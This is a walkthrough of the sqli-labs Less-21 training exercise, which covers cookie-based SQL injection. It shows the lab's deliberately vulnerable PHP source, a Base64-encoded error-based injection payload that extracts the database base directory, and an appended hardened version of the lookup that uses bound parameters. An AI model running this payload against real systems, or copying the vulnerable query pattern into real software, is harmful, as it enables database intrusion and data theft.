sqli-labs: Less 21

Less-21


A simple test:
username:admin
password:aaa


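The interface here is much the same as in the previous level. The only difference is that the cookie value is Base64-encoded. The source code for this level is: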






Less-21 Cookie Injection - Error Based - complex - string

    <?php
    // HTML markup and the database connection setup are not preserved on this page.
    // No cookie yet: show the login form and handle the login POST.
    if (!isset($_COOKIE['uname'])) {
        echo " Welcome    Dhakkan ";
        // Login form with "Username :" and "Password :" fields.

        function check_input($value)
        {
            if (!empty($value)) {
                $value = substr($value, 0, 20); // truncation (see comments)
            }
            if (get_magic_quotes_gpc()) { // Stripslashes if magic quotes enabled
                $value = stripslashes($value);
            }
            if (!ctype_digit($value)) { // Quote if not a number
                $value = "'" . mysql_real_escape_string($value) . "'";
            } else {
                $value = intval($value);
            }
            return $value;
        }

        if (isset($_POST['uname']) && isset($_POST['passwd'])) {
            // The POSTed login fields are escaped by check_input().
            $uname  = check_input($_POST['uname']);
            $passwd = check_input($_POST['passwd']);

            $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
            $result1 = mysql_query($sql);
            $row1 = mysql_fetch_array($result1);
            if ($row1) {
                // On success the username is stored in the cookie, Base64-encoded.
                setcookie('uname', base64_encode($row1['username']), time()+3600);
                echo "I LOVE YOU COOKIES";
                //echo 'Your Cookie is: ' .$cookee;
                print_r(mysql_error());
                header('Location: index.php');
            } else {
                //echo "Try again looser";
                print_r(mysql_error());
            }
        }
    } else {
        if (!isset($_POST['submit'])) {
            $cookee = $_COOKIE['uname'];
            $format = 'D d M Y - H:i:s';
            $timestamp = time() + 3600;
            echo "YOUR USER AGENT IS : " . $_SERVER['HTTP_USER_AGENT'];
            echo "YOUR IP ADDRESS IS : " . $_SERVER['REMOTE_ADDR'];
            echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE";
            echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);

            // The cookie is decoded and placed into the query without passing
            // through check_input(): this is the injection point of the level.
            $cookee = base64_decode($cookee);
            $sql = "SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
            $result = mysql_query($sql);
            if (!$result) {
                // The database error message is returned to the client.
                die('Issue with your mysql: ' . mysql_error());
            }
            $row = mysql_fetch_array($result);
            if ($row) {
                echo 'Your Login name:' . $row['username'];
                echo 'Your Password:' . $row['password'];
                echo 'Your ID:' . $row['id'];
            }
            // "Delete your cookie" form (markup not preserved).
        } else {
            echo " Your Cookie is deleted";
            setcookie('uname', base64_encode($row1['username']), time()-3600);
            header('Location: index.php');
        }
        //header ('Location: main.php');
        //logging the connection parameters to a file for analysis.
        $fp = fopen('result.txt', 'a');
        fwrite($fp, 'Cookie:' . $cookee . "\n");
        fclose($fp);
    }
    ?>

As in the previous level, we only need to modify the cookie. The one additional step is to Base64-encode the cookie value:

The cookie value is:

YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=

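Because print_r(mysql_error()) is enabled here, error-based injection can be used to retrieve whatever information you want, so that is not covered further here.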
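
Added example (not part of the original post and not sqli-labs code): a hardened form of the cookie lookup shown above, in which the Base64-decoded value is validated and bound as a query parameter, and database errors are logged rather than printed. The function name `find_user_by_cookie`, the in-memory SQLite table and its row are assumptions made so the script runs offline.

```php
<?php
// Added example, not sqli-labs code. Assumptions: PDO with the SQLite driver,
// an in-memory users table with a constructed row, a hypothetical function name.
declare(strict_types=1);

function find_user_by_cookie(PDO $db, string $cookie): ?array
{
    // Strict mode rejects input that is not valid Base64 instead of guessing.
    $name = base64_decode($cookie, true);
    if ($name === false || !preg_match('/\A[A-Za-z0-9_]{1,20}\z/', $name)) {
        return null; // malformed cookie or characters outside the allowlist
    }
    // The decoded value is bound as data; it never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = ? LIMIT 1');
    $stmt->execute([$name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data so the script runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO users (username, password) VALUES ('admin', 'constructed-hash')");

$cookies = [
    'legitimate'    => base64_encode('admin'),
    // The cookie value quoted in the post above.
    'from the page' => 'YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=',
    'not Base64'    => '%%%not-base64%%%',
];

foreach ($cookies as $label => $cookie) {
    try {
        $user = find_user_by_cookie($db, $cookie);
        echo $label, ': ', $user ? 'user id ' . $user['id'] : 'rejected', PHP_EOL;
    } catch (PDOException $e) {
        // Log server-side; do not echo driver errors to the client as the lab does.
        error_log('user lookup failed: ' . $e->getMessage());
        echo $label, ': lookup failed', PHP_EOL;
    }
}
```

Base64 only changes the representation of the cookie; the protection here comes from the bound parameter and from keeping database error text out of the response.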
